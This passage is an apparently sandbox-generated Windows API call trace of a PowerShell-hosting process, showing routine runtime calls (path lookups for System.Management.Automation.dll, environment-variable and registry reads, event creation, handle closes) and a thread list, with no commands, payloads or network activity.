	[0240.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.188] VirtualQuery (in: lpAddress=0x12ba80, lpBuffer=0x12c940, dwLength=0x30 | out: lpBuffer=0x12c940*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.192] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.192] CoTaskMemFree (pv=0x3839f0) 
	[0248.260] VirtualQuery (in: lpAddress=0x12ba80, lpBuffer=0x12c940, dwLength=0x30 | out: lpBuffer=0x12c940*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.277] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.277] CoTaskMemFree (pv=0x3839f0) 
	[0248.281] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.281] CoTaskMemFree (pv=0x3839f0) 
	[0248.283] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.283] CoTaskMemFree (pv=0x3839f0) 
	[0248.290] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.290] CoTaskMemFree (pv=0x3839f0) 
	[0248.395] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.395] CoTaskMemFree (pv=0x3839f0) 
	[0248.396] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0248.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.397] CoTaskMemFree (pv=0x3839f0) 
	[0248.402] VirtualQuery (in: lpAddress=0x12ba80, lpBuffer=0x12c940, dwLength=0x30 | out: lpBuffer=0x12c940*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0248.407] VirtualQuery (in: lpAddress=0x12ba80, lpBuffer=0x12c940, dwLength=0x30 | out: lpBuffer=0x12c940*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.655] VirtualQuery (in: lpAddress=0x12ba80, lpBuffer=0x12c940, dwLength=0x30 | out: lpBuffer=0x12c940*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.302] CoTaskMemFree (pv=0x3839f0) 
	[0252.228] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x383e30
	[0258.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.590] CoTaskMemFree (pv=0x384050) 
	[0259.435] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0259.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.435] CoTaskMemFree (pv=0x384050) 
	[0259.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.174] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0265.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.188] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12db0c, lpData=0x0, lpcbData=0x12db08*=0x0 | out: lpType=0x12db0c*=0x1, lpData=0x0, lpcbData=0x12db08*=0x56) returned 0x0
	[0265.188] CoTaskMemAlloc (cb=0x5a) returned 0x1b98c7f0
	[0265.188] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dadc, lpData=0x1b98c7f0, lpcbData=0x12dad8*=0x56 | out: lpType=0x12dadc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dad8*=0x56) returned 0x0
	[0265.188] CoTaskMemFree (pv=0x1b98c7f0) 
	[0265.188] RegCloseKey (hKey=0x368) returned 0x0
	[0265.189] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12db0c, lpData=0x0, lpcbData=0x12db08*=0x0 | out: lpType=0x12db0c*=0x1, lpData=0x0, lpcbData=0x12db08*=0x56) returned 0x0
	[0265.189] CoTaskMemAlloc (cb=0x5a) returned 0x1b98c7f0
	[0265.189] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dadc, lpData=0x1b98c7f0, lpcbData=0x12dad8*=0x56 | out: lpType=0x12dadc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dad8*=0x56) returned 0x0
	[0265.189] CoTaskMemFree (pv=0x1b98c7f0) 
	[0265.189] RegCloseKey (hKey=0x368) returned 0x0
	[0265.190] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b966af0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0265.191] CoTaskMemFree (pv=0x1b966af0) 
	[0265.191] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0265.192] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b966af0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0265.192] CoTaskMemFree (pv=0x1b966af0) 
	[0265.192] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0265.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.198] CoTaskMemFree (pv=0x384050) 
	[0265.200] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0265.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.200] CoTaskMemFree (pv=0x384050) 
	[0265.202] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0265.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.203] CoTaskMemFree (pv=0x384050) 
	[0265.206] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0265.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.206] CoTaskMemFree (pv=0x384050) 
	[0265.212] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0265.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.212] CoTaskMemFree (pv=0x384050) 
	[0265.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x368
	[0265.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x36c
	[0265.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c0
	[0265.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x180
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0265.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0265.216] CoTaskMemAlloc (cb=0x104) returned 0x384050
	[0265.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x384050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.216] CoTaskMemFree (pv=0x384050) 

Thread:
	id = 368
	os_tid = 0xdac


Thread:
	id = 369
	os_tid = 0xdb0


Thread:
	id = 370
	os_tid = 0xdb4


Thread:
	id = 371
	os_tid = 0xdb8


Thread:
	id = 372
	os_tid = 0xdbc


Thread:
	id = 373
	os_tid = 0xdc4


Thread:
	id = 374
	os_tid = 0xdc8

	[0151.134] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0154.067] RegCloseKey (hKey=0x32c) returned 0x0
	[0154.068] LocalFree (hMem=0x3338e0) returned 0x0
	[0154.068] CloseHandle (hObject=0x320) returned 1
	[0154.068] CloseHandle (hObject=0x13) returned 1
	[0154.068] CloseHandle (hObject=0xf) returned 1
	[0154.069] RegCloseKey (hKey=0x30c) returned 0x0
	[0154.069] RegCloseKey (hKey=0x308) returned 0x0
	[0154.069] RegCloseKey (hKey=0x304) returned 0x0
	[0154.069] LocalFree (hMem=0x3338b0) returned 0x0
	[0179.253] RegCloseKey (hKey=0x308) returned 0x0
	[0217.016] RegCloseKey (hKey=0x364) returned 0x0
	[0217.016] RegCloseKey (hKey=0x360) returned 0x0
	[0217.016] RegCloseKey (hKey=0x35c) returned 0x0
	[0217.016] RegCloseKey (hKey=0x358) returned 0x0
	[0217.017] RegCloseKey (hKey=0x354) returned 0x0
	[0217.017] RegCloseKey (hKey=0x2e4) returned 0x0
	[0217.017] RegCloseKey (hKey=0x340) returned 0x0
	[0217.017] RegCloseKey (hKey=0x33c) returned 0x0
	[0217.018] RegCloseKey (hKey=0x338) returned 0x0
	[0217.018] RegCloseKey (hKey=0x334) returned 0x0
	[0217.018] RegCloseKey (hKey=0x330) returned 0x0
	[0217.018] RegCloseKey (hKey=0x32c) returned 0x0
	[0217.018] RegCloseKey (hKey=0x320) returned 0x0
	[0217.018] RegCloseKey (hKey=0x374) returned 0x0
	[0217.019] RegCloseKey (hKey=0x180) returned 0x0
	[0217.019] RegCloseKey (hKey=0x1c0) returned 0x0
	[0217.019] RegCloseKey (hKey=0x36c) returned 0x0
	[0217.019] RegCloseKey (hKey=0x368) returned 0x0
	[0252.885] RegCloseKey (hKey=0x33c) returned 0x0
	[0252.885] RegCloseKey (hKey=0x338) returned 0x0
	[0252.885] RegCloseKey (hKey=0x334) returned 0x0
	[0252.885] RegCloseKey (hKey=0x330) returned 0x0
	[0252.885] RegCloseKey (hKey=0x32c) returned 0x0
	[0252.886] RegCloseKey (hKey=0x370) returned 0x0
	[0252.886] RegCloseKey (hKey=0x340) returned 0x0
	[0252.886] RegCloseKey (hKey=0x374) returned 0x0
	[0252.886] RegCloseKey (hKey=0x180) returned 0x0
	[0252.886] RegCloseKey (hKey=0x1c0) returned 0x0
	[0252.887] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.887] RegCloseKey (hKey=0x368) returned 0x0